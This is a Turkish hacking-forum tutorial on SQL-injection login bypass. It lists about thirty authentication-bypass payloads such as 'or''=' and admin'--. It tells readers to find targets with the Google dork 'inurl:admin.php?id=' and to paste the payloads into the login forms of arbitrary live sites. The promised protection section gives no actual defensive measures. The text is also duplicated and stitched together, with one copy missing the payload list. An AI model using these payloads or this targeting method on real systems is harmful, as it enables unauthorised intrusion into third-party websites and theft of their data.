Merhabalar değerli THT üyeleri ben HighFly bugün işleyeceğimiz konu başlıklarına hemen göz atalım
1-Login Bypass açığı nedir ?
2-Login Bypass kodları ?
3-sitemizi Login Bypass dan nasıl kororuz ?
4-Login Bypass nasıl yapılır ?
LOGİN BYPASS AÇIĞI NEDİR?
Login Bypass açığı girilen zararlı karakterlerden dolayı oluşan açık türüdür. Bu tür sql açıklarına girer. Login Bypass'ın amacı usarname ve password kısmına vereceğim kodları girip siteye sızmaktır. Login mekanizmasını bypass ederek içeri sızma, temel olarak zayıf bir denetimden kaynaklıdır. Saldırganlar içeri sızdığında korumasız dosyaları ararlar. Bu güvenli olmayan dosyalara erişim sağlayarak bilgi toplar ve korumlaı uygulamalara saldırmaya çalışırlar. Web uygulamalarında birçok işlem için kullanıcıdan alınan veri ile dinamik SQL cümlecikleri oluşturulur. Mesela "SELECT * FROM Urunler" örnek SQL cümleciği basit şekilde veri tabanından web uygulamasına tüm ürün bilgilerini getirecektir. Bu SQL cümlecikleri oluşturulurken araya sıkıştırılan herhangi bir meta-karakter SQL Injection'a sebep olabilir. SQL için kritik meta karakter (') tek tırnaktır. Çünkü iki tek tırnağın arası string olarak algılanır. Diğer bir önemli meta-karakter ise (;) noktalı virgüldür, satırın bittiğini ve yeni satır başladığını bildirir. Manuel olarak ise tek tırnak meta karakterini tarayıcı (Browser) üzerinde şu şekilde deneyebiliriz;
domain.com/urunler.aspx?id=20 bu isteğin sonuna (') tek tırnak konur. urunler.aspx?id=20' daha sonra site tarafından bir SQL hatası alınırsa SQL Injection yapılabileceğini göstermektedir zafiyet.
LOGİN BYPASS KODLARI
LOGİN BYPASS NASIL YAPILIR?Login Bypass yapılması için ilk olarak google amcaya bir dork yazacağız bu dork: "inurl:admin.php?id=" yazmamız gerekmekte şimdi karşımıza çıkan sitelere yukarıda verdiğim kodlardan herhangi birini şifre ve kullanıcı adı bölümüne yapıştırın eğer olmaz ise diğer sitelerde de deneyin sonuçta hep olacak diye bir şey yoktur işlemimiz bu kadar kısaydı.
Login Bypass çok kolay bir sızma işlemidir fakat tek sorununuz sitenin kolay bulunmaması olacaktır. Ve genellikle istediğimiz siteye sızamadığımız için sql injection gibi uygulamalar daha fazla kullanılmaktadır.
başka bir forumda veya konuda görüşmek üzere iyi bayramlar dilerim.
yapımcı: HighFly
1-Login Bypass açığı nedir ?
2-Login Bypass kodları ?
3-sitemizi Login Bypass dan nasıl kororuz ?
4-Login Bypass nasıl yapılır ?
LOGİN BYPASS AÇIĞI NEDİR?
Login Bypass açığı girilen zararlı karakterlerden dolayı oluşan açık türüdür. Bu tür sql açıklarına girer. Login Bypass'ın amacı usarname ve password kısmına vereceğim kodları girip siteye sızmaktır. Login mekanizmasını bypass ederek içeri sızma, temel olarak zayıf bir denetimden kaynaklıdır. Saldırganlar içeri sızdığında korumasız dosyaları ararlar. Bu güvenli olmayan dosyalara erişim sağlayarak bilgi toplar ve korumlaı uygulamalara saldırmaya çalışırlar. Web uygulamalarında birçok işlem için kullanıcıdan alınan veri ile dinamik SQL cümlecikleri oluşturulur. Mesela "SELECT * FROM Urunler" örnek SQL cümleciği basit şekilde veri tabanından web uygulamasına tüm ürün bilgilerini getirecektir. Bu SQL cümlecikleri oluşturulurken araya sıkıştırılan herhangi bir meta-karakter SQL Injection'a sebep olabilir. SQL için kritik meta karakter (') tek tırnaktır. Çünkü iki tek tırnağın arası string olarak algılanır. Diğer bir önemli meta-karakter ise (;) noktalı virgüldür, satırın bittiğini ve yeni satır başladığını bildirir. Manuel olarak ise tek tırnak meta karakterini tarayıcı (Browser) üzerinde şu şekilde deneyebiliriz;
domain.com/urunler.aspx?id=20 bu isteğin sonuna (') tek tırnak konur. urunler.aspx?id=20' daha sonra site tarafından bir SQL hatası alınırsa SQL Injection yapılabileceğini göstermektedir zafiyet.
LOGİN BYPASS KODLARI
- 'or''='
- ” or 1=1 or “”=”
- ” OR ”=”
- hey’ or 1=1–
- ‘ or 1=1–
- ” or 1=1–
- ‘ or ‘a’=’a
- ‘) or (‘a’=’a
- ‘hi’ or ‘x’=’x’;
- ‘or select *
- “)) or ((“x”))=((“x
- admin”or 1=1 or “”=”
- admin’–
- \x27\x6F\x72 SELECT *
- \x27\x4F\x52 SELECT *
- x’ or 1=1 or ‘x’=’y
- hi”) or (“a”=”a
- ” or “a”=”a
- or 1=1–
- or 1=1–
- ”Or 1 = 1′
- ‘OR”=’
- ‘ OR ”=’
- ‘ or 1=1 or ”=’
- anything’ OR ‘x’=’x
- ”Or’=’Or”
- 1’or’1’=’1
- admin”) or (“1″=”1”–
- ” or “”+”
- 'or'='or'
LOGİN BYPASS DAN NASIL KORUNURUZ?
Yazılımcıların bazen unuttuğu, bazense çok önemsemediği güvenlik açıkları, saldırganların web sitelerinde çeşitli kötü amaçlı işlemler gerçekleşebilmektedir. Bunlardan bir tanesi Login Bypass açığıdır. Bu güvenlik açığı, yöntemiyle veritabanını kontrol eden kullanıcı adı ve şifreyi kırarak gerçekleştirilir. Windows sunucularında Linux’a nazaran daha sık karşılaşılır özellikle ASP.NET ve ASP web uygulamalarında ve MsSQL ile Microsoft Access veritabanını kullanan sistemlerde önceden bir tedbir alınmadıysa bu güvenlik açığıyla karşılaşılabilir. Web sitelerini özel PHP scriptlerle oluşturan firmalar aynı zamanda birçok SQL denetimini uygulamak zorundadır. Bir saldırgan Login Bypass, Authentication Bypass, No Redirect Login Bypass gibi yöntemlerle veritabanı yönetimine erişebilir ve kullanıcıların geçerli oturum kimliklerini veya tanımlama vb. bilgileriniz çalınabilmektedir kolay yapılsa da bu işlem etkili olabilmektedir.LOGİN BYPASS NASIL YAPILIR?
Login Bypass çok kolay bir sızma işlemidir fakat tek sorununuz sitenin kolay bulunmaması olacaktır. Ve genellikle istediğimiz siteye sızamadığımız için sql injection gibi uygulamalar daha fazla kullanılmaktadır.
başka bir forumda veya konuda görüşmek üzere iyi bayramlar dilerim.
yapımcı: HighFly
İYİ GÜNLER